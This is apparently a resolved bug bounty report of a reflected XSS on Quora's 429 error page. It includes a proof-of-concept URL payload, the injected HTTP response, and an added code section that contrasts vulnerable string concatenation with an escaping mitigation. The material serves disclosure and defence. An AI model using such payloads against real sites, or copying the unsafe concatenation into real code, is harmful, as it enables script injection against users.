[controlsyou.quora.com] 429 Too Many Requests Error-Page XSS
Medium
Quora
Reported by
bobrov
Vulnerability Details
Technical details and impact analysis
**Summary:**
XSS on the error page when the user makes too many requests.
### Steps To Reproduce
1. Make a lot of requests to get the error 429
2. Open PoC in Firefox
```
https://controlsyou.quora.com/'-alert(document.domain)-'
```
**HTTP Response**
```
<script type="text/javascript">
...
ga('set', 'dimension1', 'board-'-alert(document.domain)-'');
ga('set', 'dimension2', 'False');
ga('set', 'dimension3', 'False');});});</script>
```
### Optional: Your Environment (Browser version, Device, app version, os version etc)
Tested on Firefox 50.0.2
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Generic
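
The HTTP response in the report shows the path segment landing inside a single-quoted JavaScript string in an inline `<script>`. The following is an added example, not part of the original report and not Quora's code: it models that concatenation next to one way of emitting the value as an escaped string literal, and checks both with a stubbed `alert`. All function names are hypothetical, and the escaping shown is an illustrative mitigation, not the fix Quora deployed.

```javascript
// Constructed model of the 429 page: the first path segment is echoed into a
// single-quoted string inside an inline analytics <script>.
// All function names here are hypothetical.

// Vulnerable shape: raw concatenation, matching the response in the report.
function renderNaive(segment) {
  return "<script>ga('set', 'dimension1', 'board-" + segment + "');</script>";
}

// Serialize a value as a JS string literal that is also safe inside <script>:
// JSON.stringify escapes double quotes, backslashes and control characters; the
// extra pass covers characters the HTML parser or older JS engines treat specially.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

// Hardened shape: the whole value, prefix included, goes through jsLiteral().
function renderSafe(segment) {
  return "<script>ga('set', 'dimension1', " + jsLiteral("board-" + segment) + ");</script>";
}

// Pull the third ga() argument back out as source text, then evaluate it with a
// stub alert to see whether the argument is still one inert string.
function evaluateArgument(html) {
  const start = html.indexOf("'dimension1', ") + "'dimension1', ".length;
  const src = html.slice(start, html.lastIndexOf(");</script>"));
  let alerts = 0;
  const value = new Function("alert", "document", "return (" + src + ");")(
    () => { alerts += 1; return 0; },
    { domain: "example.test" } // constructed stand-in for the page's document
  );
  return { alerts, value };
}

// Path segment taken from the PoC URL in the report.
const payload = "'-alert(document.domain)-'";
```

With the naive renderer the argument parses as an expression that calls `alert`; with the escaped literal it evaluates to the original string and nothing executes. The same helper also keeps a `</script>` sequence in the path from closing the script element early.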